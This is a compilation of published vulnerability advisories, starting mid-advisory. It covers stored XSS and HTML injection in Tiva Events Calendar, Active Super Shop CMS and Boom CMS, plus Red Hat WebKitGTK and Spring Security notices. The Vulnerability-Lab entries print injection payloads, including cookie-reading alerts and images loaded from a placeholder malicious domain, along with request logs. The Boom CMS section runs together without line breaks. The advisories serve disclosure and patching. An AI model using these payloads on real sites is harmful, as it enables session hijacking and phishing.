****-**-**: Security Acknowledgements (Security Department)  
2023-07-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Restricted Authentication (User Privileges)

User Interaction:  
=================  
Low User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
A persistent input validation web vulnerability has been discovered in the official Tiva Events Calender v1.4 web-application.  
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser  
to web-application requests from the application-side.

The vulnerability is located in the name input field and name parameter. Remote attackers privileged user accounts are able to inject  
own malicious script codes as name. Thus results in a persistent execute of the script code in the backend on edit but as well in the  
frontend (index) were the event is being displayed after the submit (save) via post method request. In the same direction it is possible  
to inject malformed client-side executable script code in get request to trigger a non-persistent execution.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects  
to malicious source and persistent manipulation of affected frontend / backend application modules.

Request Method(s):  
[+] POST / GET

Vulnerable Input(s):  
[+] Name

Vulnerable Parameter(s):  
[+] name

Affected Module(s):  
[+] index.php (Frontend on Event Preview)  
[+] edit.php (Backend on Edit ID)

Proof of Concept (PoC):  
=======================  
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.  
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Exploitation: Payload  
%20"<img src="evil.source" onload=alert(document.domain)>

Vulnerable Source: Frontend (Index)  
<tr><td class="calendar-day-normal"><span class="calendar-day-weekend">8</span></td>  
<td class="calendar-day-normal"><div class="calendar-day-file">9<div class="calendar-file-name color-4" onclick="downloadFile(220)">  
<span class="event-name">event1"%20"<img src="evil.source" onload=alert(document.domain)></span></div></div></td><td class="calendar-day-normal">10</td>  
<td class="calendar-day-normal">11</td><td class="calendar-day-normal">12</td><td class="calendar-day-normal">13</td>  
<td class="calendar-day-normal"><span class="calendar-day-weekend">14</span></td></tr>

Vulnerable Source: Backend (Edit ID)  
<section class="panel">  
<header class="panel-heading"><i class="fa fa-folder-open"></i> Edit File</header>  
<div class="panel-body">  
<div class="alert alert-success">  
<button data-dismiss="alert" class="close close-sm" type="button">  
<i class="fa fa-times"></i>  
</button>Report successfully saved.</div>    
<form class="form-horizontal" action="edit.php?id=220" method="post" enctype="multipart/form-data">  
<div class="form-group">  
<label class="col-lg-2 col-sm-2 control-label">Name<span class="star">&nbsp;*</span></label>  
<div class="col-sm-8">  
<input type="text" name="name" class="form-control" value="event1"%20"<img src="evil.source" onload=alert(document.domain)>" required />  
</div></div>

--- PoC Session Logs (POST) ---  
https://tiva-cal.localhost:8080/admin/report/edit.php  
Host: tiva-cal.localhost:8080  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Content-Type: multipart/form-data; boundary=---------------------------249785717017581481612148649683  
Content-Length: 745  
Origin:https://tiva-cal.localhost:8080  
Connection: keep-alive  
Referer:https://tiva-cal.localhost:8080/admin/report/edit.php  
Cookie: PHPSESSID=76gqk14e1s6cce40hfj11  
name="%20%20"<img src="evil.source" onload=alert(document.domain)>&type=1&time=20-08-2021&file=temp.txt&save=  
-  
POST: HTTP/2.0 200 OK  
server: nginx  
content-type: text/html  
content-length: 1283  
etag: "503-53ed12f4ca761"  
accept-ranges: bytes  
strict-transport-security: max-age=15768000; includeSubDomains  
-  
https://tiva-cal.localhost:8080/admin/report/evil.source  
Host: tiva-cal.localhost:8080  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: image/webp,*/*  
Connection: keep-alive  
Referer:https://tiva-cal.localhost:8080/admin/report/edit.php?id=222  
Cookie: PHPSESSID=76gqk14e1s6cce40hfj11  
-  
GET: HTTP/2.0 200 OK  
server: nginx  
content-type: text/html  
content-length: 1283  
etag: "503-53ed12f4ca761"  
accept-ranges: bytes  
strict-transport-security: max-age=15768000; includeSubDomains

Solution - Fix & Patch:  
=======================  
The vulnerability can be patched by the following steps ...  
1. Encode and escape the name input field content on transmit via post method  
2. Restrict the input field and disallow insert of special chars  
3. Parse the output location on the index frontend via encode to sanitize and prevent the execute  
4. Parse the output location on the edit id report backend via encode to sanitize and prevent the execute

Security Risk:  
==============  
The security risk of the persistent input validation vulnerability in the web-application is estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Tiva Events Calender 1.4 Cross Site Scripting

Active Super Shop CMS version 2.5 suffers from an html injection vulnerability.

Document Title:  
===============  
Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2278

Release Date:  
=============  
2023-07-04

Vulnerability Laboratory ID (VL-ID):  
====================================  
2278

Common Vulnerability Scoring System:  
====================================  
5.4

Vulnerability Class:  
====================  
Script Code Injection

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
https://codecanyon.net/item/active-super-shop-multivendor-cms/12124432

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered multiple html injection vulnerabilities in the Active Super Shop Multi-vendor CMS v2.5 web-application.

Affected Product(s):  
====================  
ActiveITzone  
Product: Active Super Shop CMS v2.5 (CMS) (Web-Application)

Vulnerability Disclosure Timeline:  
==================================  
2021-08-20: Researcher Notification & Coordination (Security Researcher)  
2021-08-21: Vendor Notification (Security Department)  
2021-**-**: Vendor Response/Feedback (Security Department)  
2021-**-**: Vendor Fix/Patch (Service Developer Team)  
2021-**-**: Security Acknowledgements (Security Department)  
2023-07-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Restricted Authentication (User Privileges)

User Interaction:  
=================  
Low User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
Multiple html injection web vulnerabilities has been discovered in the official Active Super Shop Multi-vendor CMS v2.5 web-application.  
The web vulnerability allows remote attackers to inject own html codes with persistent vector to manipulate application content.

The persistent html injection web vulnerabilities are located in the name, phone and address parameters of the manage profile and products branding module.  
Remote attackers with privileged accountant access are able to inject own malicious script code in the name parameter to provoke a persistent execution on  
profile view or products preview listing. There are 3 different privileges that are allowed to access the backend like the accountant (low privileges), the  
manager (medium privileges) or the admin (high privileges). Accountants are able to attack the higher privileged access roles of admins and manager on preview  
of the elements in the backend to compromise the application. The request method to inject is post and the attack vector is persistent located on the application-side.

Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and  
persistent manipulation of affected application modules.

Request Method(s):  
[+] POST

Vulnerable Module(s):  
[+] Manage Details

Vulnerable Parameter(s):  
[+] name  
[+] phone  
[+] address

Affected Module(s):  
[+] manage profile  
[+] products branding

Proof of Concept (PoC):  
=======================  
The html injection web vulnerabilities can be exploited by remote attackers with privileged accountant access and with low user interaction.  
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Exploitation: Payload  
<img src="https://[DOMAIN]/[PATH]/[PICTURE].*">

Vulnerable Source: manage_admin & branding  
<div class="tab-pane fade active in" id="" style="border:1px solid #ebebeb; border-radius:4px;">  
<div class="panel-heading">  
<h3 class="panel-title">Manage Details</h3>  
</div>  
<form action="https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/"  class="form-horizontal" method="post" accept-charset="utf-8">  
<div class="panel-body">  
<div class="form-group">  
<label class="col-sm-3 control-label" for="demo-hor-1">Name</label>  
<div class="col-sm-6">  
<input type="text" name="name" value="Mr. Accountant"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-1" class="form-control required">  
</div></div>  
<div class="form-group">  
<label class="col-sm-3 control-label" for="demo-hor-2">Email</label>  
<div class="col-sm-6">  
<input type="email" name="email" value="accountant@shop.com"  id="demo-hor-2" class="form-control required">  
</div></div>  
<div class="form-group">  
<label class="col-sm-3 control-label" for="demo-hor-3">  
Phone</label>  
<div class="col-sm-6">  
<input type="text" name="phone" value="017"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-3" class="form-control">  
</div></div>

--- PoC Session Logs (POST) ---  
https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/  
Host: assm_cms.localhost:8080  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: text/html, */*; q=0.01  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------280242453224137385302547344680  
Content-Length: 902  
Origin:https://assm_cms.localhost:8080  
Connection: keep-alive  
Referer:https://assm_cms.localhost:8080/shop/admin/manage_admin/  
Cookie: ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; curr=1  
-  
POST: HTTP/3.0 200 OK  
content-type: text/html; charset=UTF-8  
ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; path=/; HttpOnly  
https://assm_cms.localhost:8080/shop/admin/manage_admin/  
Host: assm_cms.localhost:8080  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Connection: keep-alive

Reference(s):  
https://assm_cms.localhost:8080/shop/  
https://assm_cms.localhost:8080/shop/admin/  
https://assm_cms.localhost:8080/shop/admin/manage_admin/  
https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/

Solution - Fix & Patch:  
=======================  
Disallow inseration of html code for input fields like name, adress and phone. Sanitize the content to secure deliver.

Security Risk:  
==============  
The security risk of the html injection web vulnerabilities in the shopping web-application are estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Active Super Shop CMS 2.5 HTML Injection

Red Hat Security Advisory 2023-4202-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: webkit2gtk3 security update  
Advisory ID:       RHSA-2023:4202-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4202  
Issue date:        2023-07-18  
CVE Names:         CVE-2023-32435 CVE-2023-32439   
=====================================================================

1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

Security Fix(es):

* webkitgtk: memory corruption issue leading to arbitrary code execution  
(CVE-2023-32435)

* webkitgtk: type confusion issue leading to arbitrary code execution  
(CVE-2023-32439)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2218626 - CVE-2023-32435 webkitgtk: memory corruption issue leading to arbitrary code execution  
2218640 - CVE-2023-32439 webkitgtk: type confusion issue leading to arbitrary code execution

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
webkit2gtk3-2.38.5-1.el8_8.5.src.rpm

aarch64:  
webkit2gtk3-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.5.aarch64.rpm

ppc64le:  
webkit2gtk3-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.5.ppc64le.rpm

s390x:  
webkit2gtk3-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.5.s390x.rpm

x86_64:  
webkit2gtk3-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.5.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32435  
https://access.redhat.com/security/cve/CVE-2023-32439  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJktsBfAAoJENzjgjWX9erEVxoP/36PunYG/abTGPhTbzDfc4Gr  
TWe+1YZ0Bumn74sUuOk8Fk//CMm1W5NXMCZFK+grCQ5wNvJbQEpYQMU9Xz8kcpju  
Gv64wyRnXbYPCK2EgHKKHzMTNO0dK5rG1EQAQDZ/B+rdR9eX+7+oq+Mk4PsluHjc  
lmlixilcWV1j1GX3LqebpK3bT9kyGUdIzJ0M1r3Om9jPiyzbXQF508IPX/ZDJRzr  
AhMQ0dbMEgI7tLrXa+1il0VAlO47wpowlptaQafUXdZq1CqROOUaZDyTfP/8EoaJ  
Vmb6+FWx80cr+TNz644yAu4UpGnU4ajFWGrmQ7KCl9yTEVlEosGFtMpeeg0hCMvx  
VVki9nOPCtWsFKjuGmoLWVnUoeArkC4jkBw625Vp3JbgYhDyAtu2vnUig2gEXr5z  
pHgYxJz685dxo6y7Np+qxIozEuQxn1WlzBoUA+bha5GpgLuj8SHrMLsEqq3bnDbI  
5HMxutilgJIBHepvCUHsF6hn/MiSzhe0xKa7Vr6iJ58tBAW9thmKtLEV00rbXA+t  
5wMnEZkqEO/ACBuAgXiIllPgY58BXMnX7g4Ua9QwXLGVuRog3UrsBkuKUtAegUoS  
eTqth5pj2G+f1GeEAeUhN75o7xfdnCcyfdOXNWlnrJkMje7YWo3ApGBCQrRMHs28  
o5CVaCkiRISWgqNqTP2a  
=C5ZF  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4202-01

In GeoVision GV-ADR2701 cameras, an attacker could edit the login response to access the web application.



CVE-2023-3638

Using "**" as a pattern in Spring Security configuration 
for WebFlux creates a mismatch in pattern matching between Spring 
Security and Spring WebFlux, and the potential for a security bypass.



**Description**

Using "**" as a pattern in Spring Security configuration for WebFlux creates a mismatch in pattern matching between Spring Security and Spring WebFlux, and the potential for a security bypass.

**Affected Spring Products and Versions**

Spring Security:

*   6.1.0 to 6.1.1
*   6.0.0 to 6.0.4
*   5.8.0 to 5.8.4
*   5.7.0 to 5.7.9
*   5.6.0 to 5.6.11

**Mitigation**

The following Spring Security versions contain fixes for this vulnerability:

*   6.1.2+
*   6.0.5+
*   5.8.5+
*   5.7.10+
*   5.6.12+

The above require Spring Framework versions:

*   6.0.11+
*   5.3.29+
*   5.2.25+

**Credit**

This vulnerability was disclosed responsibly by tkswifty and Ha1c9on.

**References**

*   https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C/CR:H/IR:H/AR:X/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:H/MA:N&version=3.1

CVE-2023-34034: CVE-2023-34034: WebFlux Security Bypass With Un-Prefixed Double Wildcard Pattern

Boom CMS version 8.0.7 suffers from a cross site scripting vulnerability.

    Document Title:===============Boom CMS v8.0.7 - Cross Site Scripting VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2274Release Date:=============2023-07-03Vulnerability Laboratory ID (VL-ID):====================================2274Common Vulnerability Scoring System:====================================5.3Vulnerability Class:====================Cross Site Scripting - PersistentCurrent Estimated Price:========================500€ - 1.000€Product & Service Introduction:===============================Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes lifeeasy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content.It gives editors control but doesn't require any technical knowledge.(Copy of the Homepage:https://www.boomcms.net/boom-boom  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Boom CMS v8.0.7 web-application.Affected Product(s):====================UXB LondonProduct: Boom v8.0.7 - Content Management System (Web-Application)Vulnerability Disclosure Timeline:==================================2022-07-24: Researcher Notification & Coordination (Security Researcher)2022-07-25: Vendor Notification (Security Department)2023-**-**: Vendor Response/Feedback (Security Department)2023-**-**: Vendor Fix/Patch (Service Developer Team)2023-**-**: Security Acknowledgements (Security Department)2023-07-03: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (User Privileges)User Interaction:=================Low User InteractionDisclosure Type:================Responsible DisclosureTechnical Details & Description:================================A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application.The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromisebrowser to web-application requests from the application-side.The vulnerability is located in the input fields of the album title and album description in the asset-manager module.Attackers with low privileges are able to add own malformed albums with malicious script code in the title and description.After the inject the albums are being displayed in the backend were the execute takes place on preview of the main assets.The attack vector of the vulnerability is persistent and the request method to inject is post. The validation tries to parsethe content by usage of a backslash. Thus does not have any impact to inject own maliciousjava-scripts because of its only performed for double- and single-quotes to prevent sql injections.Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistentexternal redirects to malicious source and persistent manipulation of affected application modules.Request Method(s):[+] POSTVulnerable Module(s):[+] assets-manager (album)Vulnerable Function(s):[+] addVulnerable Parameter(s):[+] title[+] descriptionAffected Module(s):[+] Frontend (Albums)[+] Backend (Albums Assets)Proof of Concept (PoC):=======================The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.Manual steps to reproduce the vulnerability ...1. Login to the application as restricted user2. Create a new album3. Inject a test script code payload to title and description4. Save the request5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution6. Successful reproduce of the persistent cross site web vulnerability!Payload(s):><script>alert(document.cookie)</script><div style=1<a onmouseover=alert(document.cookie)>test</a>--- PoC Session Logs (Inject) ---https://localhost:8000/boomcms/album/35Host: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/jsonX-Requested-With: XMLHttpRequestContent-Length: 263Origin:https://localhost:8000Connection: keep-aliveReferer:https://localhost:8000/boomcms/asset-manager/albums/[evil.source]Sec-Fetch-Site: same-origin{"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>","slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by":null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"}-PUT: HTTP/1.1 200 OKServer: ApacheCache-Control: no-cache, privateSet-Cookie: Max-Age=7200; path=/Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUFVV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtYyOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;Max-Age=7200; path=/; httponlyContent-Length: 242Connection: Keep-AliveContent-Type: application/json-https://localhost:8000/boomcms/asset-manager/albums/[evil.source]Host: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflate, brConnection: keep-aliveCookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUFVV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtYyOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;-GET: HTTP/1.1 200 OKServer: ApacheCache-Control: no-cache, privateSet-Cookie:Vary: Accept-EncodingContent-Length: 7866Connection: Keep-AliveContent-Type: text/html; charset=UTF-8-Vulnerable Source: asset-manager/albums/[ID]<li data-album="36">         <a href="#albums/20">             <div>                 <h3>[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]</h3>                 <p class="description">"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>                 <p class='count'><span>0</span> assets</p>             </div>         </a>     </li></iframe></p></div></a></li></ul></div></div>         </div>         <div id="b-assets-view-asset-container"></div>         <div id="b-assets-view-selection-container"></div>         <div id="b-assets-view-album-container"><div><div id="b-assets-view-album">         <div class="heading">             <h1 class="bigger b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]></h1>             <p class="description b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>         </div>Solution - Fix & Patch:=======================The vulnerability can be patched by a secure parse and encode of the vulnerable title and description parameters.Restrict the input fields and disallow usage of special chars. Sanitize the output listing location to prevent further attacks.Security Risk:==============The security risk of the persistent input validation web vulnerability in the application is estimated as medium.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Tag

#web